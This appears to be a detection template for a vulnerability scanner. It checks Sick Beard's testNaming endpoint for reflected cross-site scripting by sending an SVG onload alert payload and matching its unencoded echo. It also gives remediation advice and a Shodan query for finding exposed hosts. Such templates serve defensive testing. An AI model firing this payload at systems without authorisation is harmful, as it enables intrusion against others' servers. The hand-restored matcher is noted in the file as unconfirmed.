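# Detection template: reflected XSS in the Sick Beard post-processing
# "testNaming" endpoint. It sends one GET request with a harmless probe in the
# `pattern` query parameter and reports a finding only when all three
# matchers below agree.
id: sick-beard-xss

info:
  name: Sick Beard XSS
  author: pikpikcu
  severity: medium
  description: |
    Checks whether the `pattern` query parameter of
    /config/postProcessing/testNaming is echoed back unencoded in a
    text/html response, which indicates reflected cross-site scripting.
  remediation: |
    HTML-encode the `pattern` value before it is written into the response,
    and keep the Sick Beard web interface behind authentication and off
    untrusted networks.
  reference:
    - https://sickbeard.com/  # vendor homepage
    - https://github.com/midgetspy/Sick-Beard  # software link
  metadata:
    shodan-query: sickbeard
  tags: xss

requests:
  - method: GET
    path:
      # The probe is URL-encoded in the request; the server decodes it before
      # (possibly) reflecting it.
      - "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"

    # All matchers must hold; any single one alone is too weak a signal.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # The probe must come back in the body with its angle brackets intact.
      # An HTML-encoded reflection (&lt;svg...) does not match, so correctly
      # escaping servers are not reported.
      # NOTE(review): the word literal was absent from the listing this was
      # recovered from (the `words` list was empty, which would make this
      # matcher meaningless and leave only "200 + text/html" as the finding
      # criteria). It is restored here as the decoded form of the request
      # probe; confirm against the upstream template.
      - type: word
        part: body
        words:
          - '<svg/onload=alert(document.domain)>'

      # Only count the reflection when the response is served as HTML, since
      # the same bytes in a JSON or plain-text response are not rendered as
      # markup by the browser.
      - type: word
        part: header
        words:
          - 'text/html'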